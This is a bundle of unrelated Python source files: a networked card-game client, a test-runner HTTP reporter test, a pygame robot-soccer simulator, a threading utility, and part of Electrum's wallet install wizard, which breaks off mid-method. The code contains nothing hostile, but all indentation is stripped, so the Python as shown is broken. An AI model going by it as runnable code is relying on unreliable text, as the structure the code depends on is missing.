starting_pile_id = 0
for pile_set in game_config['cardpiles']:
if pile_set['piletype'] == 'PlayerPile':
if pile_set['display'] == 'SELF':
if self.self_player_index>=0:
card_pile = cardpile.CardPile(
card_pile_id=starting_pile_id+self.self_player_index,
mat_center=tuple(pile_set['mat_center']),
mat_size=tuple(pile_set['mat_size']),
mat_boundary=tuple(pile_set['mat_boundary']),
card_size=tuple(pile_set['card_size']),
card_offset=tuple(pile_set['card_offset']),
mat_color=tuple(pile_set['mat_color']),
button_width=pile_set['button_width'] if 'button_width' in pile_set else None,
button_height=pile_set['button_height'] if 'button_height' in pile_set else None,
size_scaler=self._size_scaler,
sorting_rule=Sorting_Rule[pile_set['sorting_rule']],
auto_sort_setting=Auto_Sort[pile_set['auto_sort_setting']],
enable_sort_button=pile_set['enable_sort_button'],
enable_clear_button=pile_set['enable_clear_button'],
enable_recover_last_removed_cards=pile_set['enable_recover_last_removed_cards'],
enable_flip_all=pile_set['enable_flip_all'],
enable_face_up_all=pile_set['enable_face_up_all'] if 'enable_face_up_all' in pile_set else False,
title_property=pile_set['title'],
update_event_handle=self.add_event,
other_properties={'player_index': player_index}
)
self.card_pile_list.append(card_pile)
self.pile_mat_list.append(card_pile.mat)
self.resize_list.append(card_pile)
elif pile_set['display'] == 'ALL_PLAYER_CIRCLE':
for player_index in range(self.n_player):
pile_position = calculate_circular_pile_set_positions(
starting_mat_center=tuple(pile_set['starting_mat_center']),
pile_offset=tuple(pile_set['pile_offset']),
piles_per_side=tuple(pile_set['piles_per_side']),
player_index=player_index,
n_player=self.n_player,
pile_position_offset=pile_set['pile_position_offset'],
starting_index_type = Pile_Position_Offset[pile_set['pile_position_offset_type']],
self_player_index=self.self_player_index,
counterclockwise=pile_set['direction'] == 'COUNTERCLOCKWISE'
)
card_pile = cardpile.CardPile(
card_pile_id=player_index + starting_pile_id,
mat_center=(pile_position[0], pile_position[1]),
mat_size=tuple(pile_set['mat_size']),
mat_boundary=tuple(pile_set['mat_boundary']),
card_size=tuple(pile_set['card_size']),
card_offset=tuple(pile_set['card_offset']),
mat_color=tuple(pile_set['self_mat_color']) if (player_index==self.self_player_index and 'self_mat_color' in pile_set) else tuple(pile_set['mat_color']),
button_width=pile_set['button_width'] if 'button_width' in pile_set else None,
button_height=pile_set['button_height'] if 'button_height' in pile_set else None,
size_scaler=self._size_scaler,
sorting_rule=Sorting_Rule[pile_set['sorting_rule']],
auto_sort_setting=Auto_Sort[pile_set['auto_sort_setting']],
enable_sort_button=pile_set['enable_sort_button'],
enable_clear_button=pile_set['enable_clear_button'],
enable_recover_last_removed_cards=pile_set['enable_recover_last_removed_cards'],
enable_flip_all=pile_set['enable_flip_all'],
enable_face_up_all=pile_set['enable_face_up_all'] if 'enable_face_up_all' in pile_set else False,
title_property=pile_set['title'],
update_event_handle=self.add_event,
other_properties={'player_index': player_index}
)
self.card_pile_list.append(card_pile)
self.pile_mat_list.append(card_pile.mat)
self.resize_list.append(card_pile)
# add starting pile id
starting_pile_id += self.n_player
elif pile_set['piletype'] == 'PublicPile':
#if pile_set['display'] == 'ALL':
card_pile = cardpile.CardPile(
card_pile_id=starting_pile_id,
mat_center=tuple(pile_set['mat_center']),
mat_size=tuple(pile_set['mat_size']),
mat_boundary=tuple(pile_set['mat_boundary']),
card_size=tuple(pile_set['card_size']),
card_offset=tuple(pile_set['card_offset']),
mat_color=tuple(pile_set['mat_color']),
button_width=pile_set['button_width'] if 'button_width' in pile_set else None,
button_height=pile_set['button_height'] if 'button_height' in pile_set else None,
size_scaler=self._size_scaler,
sorting_rule=Sorting_Rule[pile_set['sorting_rule']],
auto_sort_setting=Auto_Sort[pile_set['auto_sort_setting']],
enable_sort_button=pile_set['enable_sort_button'],
enable_clear_button=pile_set['enable_clear_button'],
enable_recover_last_removed_cards=pile_set['enable_recover_last_removed_cards'],
enable_flip_all=pile_set['enable_flip_all'],
enable_face_up_all=pile_set['enable_face_up_all'] if 'enable_face_up_all' in pile_set else False,
title_property=pile_set['title'],
update_event_handle=self.add_event
)
self.card_pile_list.append(card_pile)
self.pile_mat_list.append(card_pile.mat)
self.resize_list.append(card_pile)
starting_pile_id+=1
elif pile_set['piletype'] == 'CardDeck':
#if pile_set['display'] == 'ALL':
card_pile = cardpile.CardDeck(
card_pile_id=starting_pile_id,
mat_center=tuple(pile_set['mat_center']),
mat_size=tuple(pile_set['mat_size']),
mat_boundary=tuple(pile_set['mat_boundary']),
card_size=tuple(pile_set['card_size']),
card_offset=tuple(pile_set['card_offset']),
mat_color=tuple(pile_set['mat_color']),
button_width=pile_set['button_width'] if 'button_width' in pile_set else None,
button_height=pile_set['button_height'] if 'button_height' in pile_set else None,
vertical_button_width=pile_set['vertical_button_width'],
vertical_button_height=pile_set['vertical_button_height'],
size_scaler=self._size_scaler,
per_deck_cards=pile_set['per_deck_cards'],
face_down=pile_set['face_down'],
enable_clear_button=pile_set['enable_clear_button'],
enable_flip_all=pile_set['enable_flip_all'],
enable_face_up_all=pile_set['enable_face_up_all'] if 'enable_face_up_all' in pile_set else False,
enable_generation=pile_set['enable_generation'],
num_of_decks_per_generation=pile_set['num_of_decks_per_generation'],
enable_auto_distribution=pile_set['enable_auto_distribution'],
destination_piles_and_cards=pile_set['destination_piles_and_cards'],
title_property=pile_set['title'],
update_event_handle=self.add_event,
other_properties={'player_index': player_index,
'constants': {'CONST_NPLAYER': self.n_player},
'pile_tag_to_pile_id': pile_tag_to_pile_id
},
)
self.card_pile_list.append(card_pile)
self.pile_mat_list.append(card_pile.mat)
self.resize_list.append(card_pile)
starting_pile_id+=1
# add ui element
for card_pile in self.card_pile_list:
new_ui_elments = card_pile.get_ui_elements()
for element in new_ui_elments:
self.ui_manager.add_ui_element(element)
for game_button in game_config['gamebuttons']:
new_game_button = ResizableGameFlatButton(
click_event=self.initiate_game_restart if game_button['action']=='initiate_game_restart' else (
self.reset_player_and_game if game_button['action']=='reset_player_and_game' else None),
width = game_button['size'][0],
height=game_button['size'][1],
center_x=game_button['center'][0],
center_y=game_button['center'][1],
size_scaler=self._size_scaler,
font_size=game_button['font_size'],
bg_color=tuple(game_button['bg_color']),
text=game_button['text']
)
self.ui_manager.add_ui_element(new_game_button)
self.resize_list.append(new_game_button)
def on_update(self, delta_time):
""" on update, which is called in the event loop."""
if self.game_state:
if self.game_state.status=='Wait for Player to Join':
self.ui_manager.purge_ui_elements()
connect_view = ConnectView(player_id=self.player_id)
connect_view.setup()
self.window.show_view(connect_view)
return
elif self.game_state.status=='New Game':
self.game_state.status='In Game'
self.clear_all_piles()
held_cards_value = [w.value for w in self.held_cards]
active_cards_value = [w.value for w in self.active_cards]
# update piles
for w in self.card_pile_list:
if w.card_pile_id not in self.game_state.cards_in_pile:
card_changed_removed = w.from_value_face([],
self.game_state.cards_status)
else:
card_changed_removed = w.from_value_face(self.game_state.cards_in_pile[w.card_pile_id],
self.game_state.cards_status)
# check whether hand-held cards affected
for card_value in card_changed_removed:
if card_value in held_cards_value:
index = held_cards_value.index(card_value)
if self.held_cards[index] == self.card_on_press:
self.card_on_press = None
self.held_cards.remove(self.held_cards[index])
self.held_cards_original_position.remove(self.held_cards_original_position[index])
held_cards_value.remove(held_cards_value[index])
if card_value in active_cards_value:
index = active_cards_value.index(card_value)
self.active_cards[index].active = False
self.active_cards.remove(self.active_cards[index])
active_cards_value.remove(active_cards_value[index])
if w.title_type == Title_Type.PLAYER_NAME:
if 'player_index' in w.other_properties:
if w.other_properties['player_index'] in self.game_state.player_name:
if w.title!=self.game_state.player_name[w.other_properties['player_index']]:
w.title = self.game_state.player_name[w.other_properties['player_index']]
elif w.title_type == Title_Type.SCORE:
if 'score_type' in w._title_property:
scores = utils.calculate_score(w.to_valuelist(), utils.Score_Rule[w._title_property['score_type']])
if w.title != str(scores):
if w.title.isdigit() or scores>0:
w.title = str(scores)
if w.card_pile_id in self.game_state.pile_property:
w.update_ui_property(self.game_state.pile_property[w.card_pile_id])
def on_draw(self):
""" Render the screen. """
arcade.start_render()
# Draw the mats the cards go on to
self.pile_mat_list.draw()
for card_pile in self.card_pile_list[::-1]:
card_pile.draw()
def get_pile_for_card(self, card):
for index, pile in enumerate(self.card_pile_list):
if card in pile:
return pile
def on_mouse_press(self, x, y, button, key_modifiers):
""" Called when the user presses a mouse button. """
self.card_on_press = None
c_mats = arcade.get_sprites_at_point((x, y), self.pile_mat_list)
if len(c_mats)>0:
c_card_pile = c_mats[0].cardpile
if button == arcade.MOUSE_BUTTON_RIGHT and (key_modifiers & arcade.key.MOD_ALT):
# with control, sort current piles
c_card_pile.resort_cards()
elif button == arcade.MOUSE_BUTTON_RIGHT and (key_modifiers & arcade.key.MOD_CTRL):
self.clear_a_pile(c_card_pile)
else:
cards = arcade.get_sprites_at_point((x, y), c_card_pile)
if len(cards) > 0:
primary_card = cards[-1]
if button == arcade.MOUSE_BUTTON_LEFT:
self.card_on_press = primary_card
if not primary_card.active:
if len(self.active_cards)>=1:
# check if the pile being clicked on is the same as the active cards
current_pile = self.get_pile_for_card(self.card_on_press)
active_card_pile = self.get_pile_for_card(self.active_cards[0])
if current_pile != active_card_pile:
# if the card being clicked on belongs to a different pile than those active cards. deactive other cards
for card in self.active_cards:
card.active = False
self.active_cards = []
# will held this regardless whether its active
self.held_cards.append(primary_card)
self.held_cards_original_position.append(primary_card.position)
# all active card will move together
for card in self.active_cards:
self.held_cards.append(card)
self.held_cards_original_position.append(card.position)
elif button == arcade.MOUSE_BUTTON_RIGHT:
self.flip_card(primary_card)
def on_mouse_release(self, x: float, y: float, button: int,
modifiers: int):
""" Called when the user presses a mouse button. """
# If we don't have any cards, who cares
if self.card_on_press is None:
return
if button == arcade.MOUSE_BUTTON_RIGHT:
return
# Find the closest pile, in case we are in contact with more than one
mat_of_new_pile, distance = clientelements.get_minimum_distance_mat(self.card_on_press, self.pile_mat_list)
reset_position = True
# See if we are in contact with the closest pile
if arcade.check_for_collision(self.card_on_press, mat_of_new_pile):
# What pile is it?
new_pile = mat_of_new_pile.cardpile#self.pile_mat_list.index(pile)
# Is it the same pile we came from?
old_pile = self.get_pile_for_card(self.card_on_press)
if new_pile == old_pile:
cards = arcade.get_sprites_at_point((x, y), new_pile)
if len(cards) >= 1:
primary_card = cards[-1]
if primary_card is not None:
if primary_card == self.card_on_press:
# did not move position
if self.card_on_press.active:
# if it were active
self.card_on_press.active = False
self.active_cards.remove(self.card_on_press)
else:
self.card_on_press.active = True
self.active_cards.append(self.card_on_press)
self.card_on_press = None
else:
self.move_cards(self.held_cards, new_pile)
for card in self.active_cards:
card.active = False
self.active_cards = []
# Success, don't reset position of cards
reset_position = False
if reset_position:
# Where-ever we were dropped, it wasn't valid. Reset the each card's position
# to its original spot.
for card_index, card in enumerate(self.held_cards):
card.position = self.held_cards_original_position[card_index]
# We are no longer holding cards
self.held_cards = []
self.held_cards_original_position = []
def on_mouse_motion(self, x: float, y: float, dx: float, dy: float):
""" User moves mouse """
# If we are holding cards, move them with the mouse
for card in self.held_cards:
card.center_x += dx
card.center_y += dy
def move_cards(self, cards, new_pile):
old_pile = self.get_pile_for_card(cards[0])
for i, dropped_card in enumerate(cards):
new_pile.add_card(dropped_card)
old_pile.remove_card(dropped_card)
new_event = gamestate.Event(
type='Move',
player_index=self.self_player_index,
src_pile = old_pile.card_pile_id,
dst_pile = new_pile.card_pile_id,
cards = [card.value for card in cards]
)
self.event_buffer.append(new_event)
self.game_state.update_from_event(new_event)
def flip_card(self, card):
new_face=card.face_flipped()
new_event = gamestate.Event(
type='Flip',
player_index=self.self_player_index,
cards = [card.value],
cards_status = {card.value:new_face}
)
self.event_buffer.append(new_event)
self.game_state.update_from_event(new_event)
card.face= new_face
def add_event(self, new_event, local_fast_update=True):
self.event_buffer.append(new_event)
if local_fast_update:
self.game_state.update_from_event(new_event)
def reset_player_and_game(self):
new_event = gamestate.EventConnect(type='ResetPlayerAndGame')
self.event_buffer.append(new_event)
def initiate_game_restart(self):
new_event = gamestate.EventConnect(type='StartNewGame')
self.event_buffer.append(new_event)
def thread_pusher(window: CardGame, server_ip:str):
ctx = Context()
push_sock: Socket = ctx.socket(zmq.PUSH)
push_sock.connect(f'tcp://{server_ip}:25001')
try:
while True:
if window.event_buffer:
d = window.event_buffer.pop()
msg = dict(counter=1, event=asdict(d))
print(msg)
push_sock.send_json(msg)
time.sleep(1 / UPDATE_TICK)
finally:
push_sock.close(1)
ctx.destroy(linger=1)
def thread_receiver(window: CardGame, server_ip: str):
ctx = Context()
sub_sock: Socket = ctx.socket(zmq.SUB)
sub_sock.connect(f'tcp://{server_ip}:25000')
sub_sock.subscribe('')
try:
while True:
gs_dict = sub_sock.recv_json(object_hook=gamestate.json_obj_hook)
window.update_game_state(gs_dict)
time.sleep(1 / UPDATE_TICK)
finally:
sub_sock.close(1)
ctx.destroy(linger=1)
def main(args):
""" Main method """
with open(args.game_file) as file:
# The FullLoader parameter handles the conversion from YAML
# scalar values to Python the dictionary format
game_cfg = yaml.load(file, Loader=yaml.SafeLoader) # , Loader=yaml.SafeLoader)
print(game_cfg)
window = CardGame(game_cfg=game_cfg, title='CARDGAME', resizable=True)
connect_view = ConnectView()
connect_view.setup()
window.show_view(connect_view)
thread1 = threading.Thread(
target=thread_pusher, args=(window, args.server_ip,), daemon=True)
thread2 = threading.Thread(
target=thread_receiver, args=(window, args.server_ip,), daemon=True)
thread1.start()
thread2.start()
arcade.run()
if __name__ == "__main__":
args = parser.parse_args()
main(args) |
http_reporter_test.py | import json
import threading
import tornado.ioloop
import tornado.httpserver
import tornado.web
import Queue
from testify import assert_equal, setup_teardown, TestCase
from testify.test_runner import TestRunner
from testify.plugins.http_reporter import HTTPReporter
class DummyTestCase(TestCase):
__test__ = False
def test(self):
pass
class HTTPReporterTestCase(TestCase):
@setup_teardown
def make_fake_server(self):
self.results_reported = []
self.status_codes = Queue.Queue()
class ResultsHandler(tornado.web.RequestHandler):
def post(handler):
result = json.loads(handler.request.body)
self.results_reported.append(result)
try:
status_code = self.status_codes.get_nowait()
handler.send_error(status_code)
except Queue.Empty:
handler.finish("kthx")
def get_error_html(handler, status, **kwargs ):
return "error"
app = tornado.web.Application([(r"/results", ResultsHandler)])
srv = tornado.httpserver.HTTPServer(app)
srv.listen(0)
portnum = srv._socket.getsockname()[1]
iol = tornado.ioloop.IOLoop.instance()
thread = threading.Thread(target=iol.start)
thread.daemon = True # If for some reason this thread gets blocked, don't prevent quitting.
thread.start()
self.connect_addr = "localhost:%d" % portnum
yield
iol.stop()
thread.join()
def test_http_reporter_reports(self):
"""A simple test to make sure the HTTPReporter actually reports things."""
runner = TestRunner(DummyTestCase, test_reporters=[HTTPReporter(None, self.connect_addr, 'runner1')])
runner.run()
(only_result,) = self.results_reported
assert_equal(only_result['runner_id'], 'runner1')
assert_equal(only_result['method']['class'], 'DummyTestCase')
assert_equal(only_result['method']['name'], 'test')
def test_http_reporter_tries_twice(self):
self.status_codes.put(409)
self.status_codes.put(409)
runner = TestRunner(DummyTestCase, test_reporters=[HTTPReporter(None, self.connect_addr, 'tries_twice')])
runner.run()
(first, second) = self.results_reported
assert_equal(first['runner_id'], 'tries_twice')
assert_equal(first, second)
# vim: set ts=4 sts=4 sw=4 et:
|
main.py | import json
import socket
import threading
import pygame
import ball
import constants
import field
import robot
pygame.init()
screen = pygame.display.set_mode((1200, 600))
# Title and Icon🤖
pygame.display.set_caption('🤖Neon VSS Simulation🤖')
icon = pygame.image.load('resources/icon.png')
pygame.display.set_icon(icon)
clock = pygame.time.Clock()
NOPLAN_LISTENER = ('localhost', 5778)
listener_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
NOPLAN_SENDER = ('localhost', 5777)
sender_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class Game:
def no_plan_listener(self):
listener_sock.bind(NOPLAN_LISTENER)
while True:
data, address = listener_sock.recvfrom(4096)
if data:
self.message = data.decode('utf-8')
print(self.message)
def sent_to_no_plan(self, data):
sender_sock.sendto(bytes(json.dumps(data), 'utf-8'), NOPLAN_SENDER)
def __init__(self, blue_robots=None, yellow_robots=None, ball_pos=(0, 0)):
if yellow_robots is None:
yellow_robots = []
if blue_robots is None:
blue_robots = []
self.message = []
self.field = field.Field()
self.ball = ball.Ball(pos=ball_pos)
self.robots = []
self.running = False
for robot_ in blue_robots:
self.robots.append(
robot.Robot('blue', self.field, robot_['start_position'], robot_['orientation'],
radio_id=robot_['radio_id'], vision_id=robot_['vision_id'])
)
for robot_ in yellow_robots:
self.robots.append(
robot.Robot('yellow', self.field, robot_['start_position'], robot_['orientation'],
radio_id=robot_['radio_id'], vision_id=robot_['vision_id'])
)
def build_for_noplan(self):
self.timestamp += 1
entities_data = {
't_capture': self.timestamp,
'robots_blue': [
{
'x': r.position[0],
'y': r.position[1],
'orientation': r.orientation,
'robot_id': r.vision_id
} for r in self.robots if r.team_color == 'blue'
],
'robots_yellow': [
{
'x': r.position[0],
'y': r.position[1],
'orientation': r.orientation,
'robot_id': r.vision_id
} for r in self.robots if r.team_color == 'yellow'
],
'balls': [{'x': self.ball.position[0], 'y': self.ball.position[1], 'speed': {'x': 0, 'y': 0}}]}
data = {
'detection': entities_data,
'geometry': {}
}
return data
def start(self):
self.timestamp = 0
self.running = True
listener_thread = threading.Thread(target=self.no_plan_listener, args=())
listener_thread.start()
while self.running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.running = False
if event.type == pygame.MOUSEBUTTONUP:
pos = pygame.mouse.get_pos()
w, h = pygame.display.get_surface().get_size()
self.ball.position = (pos[0] - w/2)*2, (pos[1] - h/2)*2
screen.fill(constants.COLORS.NEON_BLACK)
self.field.update(screen)
self.ball.update(screen)
for rb in self.robots:
try:
rb_message = list(filter(lambda x: x[0] == rb.vision_id, json.loads(self.message)))
if rb_message:
rb.update(screen, rb_message[0])
else:
rb.update(screen, [0, 1, 0, 0])
except:
pass
pygame.display.update()
self.sent_to_no_plan(self.build_for_noplan())
config = json.loads(open('match_config.json', 'r').read())
match = Game(**config)
match.start()
|
common.py | import os
import threading
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
def path_hierarchy(path):
hierarchy = os.path.basename(path)
try:
return {
hierarchy: [
path_hierarchy(os.path.join(path, contents))
for contents in os.listdir(path)
]
}
except OSError as e:
pass
if hierarchy == "":
return []
return hierarchy
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage
from electrum.util import UserCancelled, InvalidPassword, WalletFileException
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
run_next(*out)
except GoBack:
if wizard.can_go_back():
wizard.go_back()
return
else:
wizard.close()
raise
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
BaseWizard.__init__(self, config, plugins)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None) #
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
